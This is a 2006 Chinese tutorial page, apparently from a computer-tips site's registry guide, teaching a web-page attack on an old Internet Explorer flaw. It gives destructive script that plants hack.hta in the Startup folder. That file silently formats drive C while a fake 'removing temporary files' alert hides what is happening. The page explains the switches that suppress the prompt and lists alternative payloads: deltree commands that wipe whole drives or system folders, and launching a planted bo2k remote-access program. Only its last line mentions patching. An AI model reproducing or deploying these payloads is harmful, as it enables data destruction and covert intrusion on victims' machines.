注册表全攻略,网页攻击教学-注册表全攻略

网页攻击教学-注册表全攻略 - 注册表 - 电脑教程网

网页攻击教学-注册表全攻略

日期:2006-04-26   荐:

58、网页攻击教学  

    前叙∶ 

    这项技术是在没多久以前台湾所流行的攻击法,你知道利用漏洞的厉害在哪吗?这一项教学就是利用微软  ( Microsoft )的IE浏览器( Internet EXPlorer )所衍生出来的攻击方法。 
教学开始∶ 
    以下这段就是具有破坏性的Html 
Hacking Your Computer . 
scr.Reset(); 
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"; 
scr.Doc=" 
wsh.Run('start.exe /m format c:/q /autotest /u'); 
alert('IMPORTANT : Windows is removing unused temporary files.');"; 
scr.write(); 
(懂HTML的人应该就看得出来其中精随) 
现在我大概来解释其中几个项目所写的意思 
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta" 
这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为 hack.hta 
wsh.Run('start.exe /m format c:/q /autotest /u'); 
    通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。 
    它是一个微软没有公开的功能,键入後format的动作便会被强制执行。
    这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。 最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小化的状态。 
执行其他攻击指令的方法∶ 
    只要修改“start.exe /m format c:/q /autotest /u”这一项便形。 
start.exe /m format c:/q /autotest /u 
其中的“c:”可以换做其他的硬碟。 

(path)\bo2k.exe 
    执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。 
start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 
杀掉对方硬碟底下所有的档案。 
start.exe /m deltree /y c:\windows\system\*.* 
杀掉对方c:\windows\system\目录底下的所有档案。 
    後叙∶ 
    预防遭此手段的破坏就是到微软去更新你的浏览器。

(出处:http://www.sheup.com)




标签: